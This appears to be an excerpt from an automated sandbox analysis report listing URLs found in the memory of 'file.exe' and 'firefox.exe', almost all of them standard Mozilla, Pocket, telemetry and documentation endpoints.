Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000021.00000003.3346404548.00000169CE43E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3139946227.00000169D9D82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3115451545.00000169D9D82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3233159876.00000169D9B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3233159876.00000169D9B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000021.00000003.3342073093.00000169D1A69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000021.00000003.3114351181.00000169C552F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.c
Source: firefox.exe, 00000021.00000003.3038682023.00000169C91F1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2928245347.00000169C974A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2921875534.00000169C9707000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3185884753.00000169C91ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2945016506.00000169C91EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3277423636.00000169C91F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2947727830.00000169C91EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3180848260.00000169C91F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000021.00000003.3332787650.00000169D9955000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152110944.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341844231.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3304973847.00000169CC1E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000021.00000003.3228316187.00000169CBEDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3304973847.00000169CC1E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197600394.00000169CBEDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3305729719.00000169CAD1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3263880810.00000169CA0FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000021.00000003.3220435804.00000169D9FBF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000021.00000003.3343769364.00000169CE4FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BB8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3401672896.00000169CAE81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 00000021.00000003.3391531439.00000169CAEF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
Source: firefox.exe, 00000021.00000003.3353641675.00000169CC334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/
Source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152110944.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341844231.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 00000021.00000003.3245644401.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000021.00000003.3080819409.00000169D9EF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3073977083.00000169D9EE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3037729550.00000169D9EF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3277154502.00000169D9EE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3090339911.00000169D9EE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3419032037.00000169D9EE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3020553973.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3272670554.00000169D9ED1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3019064071.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3031496954.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000021.00000003.3080819409.00000169D9EF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3073977083.00000169D9EE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3037729550.00000169D9EF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3277154502.00000169D9EE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3090339911.00000169D9EE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3419032037.00000169D9EE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3020553973.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3272670554.00000169D9ED1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3019064071.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3031496954.00000169D9EEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000021.00000003.2921875534.00000169C9707000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2926052120.00000169C9729000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2918607295.00000169C9500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3377874942.00000169D9792000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 00000021.00000003.3070395841.00000169D5F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000021.00000003.3415678742.00000169CAC8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000021.00000003.3139946227.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000021.00000003.3415887521.00000169CAC6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000021.00000003.3402637231.00000169D9740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3146184459.00000169D9741000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3239166770.00000169D9741000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000021.00000003.3414526277.00000169CACBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/4a2f1980-72d4-4e52-ac06-64361
Source: firefox.exe, 00000021.00000003.3399821667.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400899355.00000169CAF85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3413469989.00000169CAF89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/52db9a1c-f748-48fa-a9e3-6dbf
Source: firefox.exe, 00000021.00000003.3389754862.00000169CAFCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/top-sites/1/d3698c60-da91-4f8c-b7c7-e1
Source: firefox.exe, 00000021.00000003.3397835645.00000169CD87C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3391857028.00000169CAEE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/19dc561a-517b-4875
Source: firefox.exe, 00000021.00000003.3397835645.00000169CD87C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3391531439.00000169CAEF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/39e48eef-5b6b-464c
Source: firefox.exe, 00000021.00000003.3400687801.00000169CAFCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3389754862.00000169CAFCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3392258143.00000169CAECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/messaging-system/undesired-events/1/e86bff9f-a9ea-409f
Source: firefox.exe, 00000021.00000003.3335063517.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3117298349.00000169D977A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3236635003.00000169D9776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000021.00000003.3071622639.00000169CE4A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3395242716.00000169CB5D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3344434976.00000169CE4A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3154252426.00000169CE4A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000021.00000003.3017638643.00000169D9E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3074656356.00000169D9E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3022138525.00000169D9E1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3092638388.00000169D9E07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000021.00000003.3416346439.00000169CAC5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3348526252.00000169CD866000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3397835645.00000169CD87C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3123001471.00000169C9ED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000021.00000003.3353641675.00000169CC334000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000021.00000003.3414526277.00000169CACBD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3366955448.00000169CBDF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3143474951.00000169D977A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000021.00000003.3415533966.00000169CAC98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000021.00000003.3381962602.00000169CCDA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3157569738.00000169CCD94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3254249599.00000169CCD94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 00000021.00000003.3332342945.00000169D9978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3234415020.00000169D9978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3068413093.00000169D9977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000021.00000003.3115451545.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3139946227.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000021.00000003.3115451545.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3139946227.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9D97000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
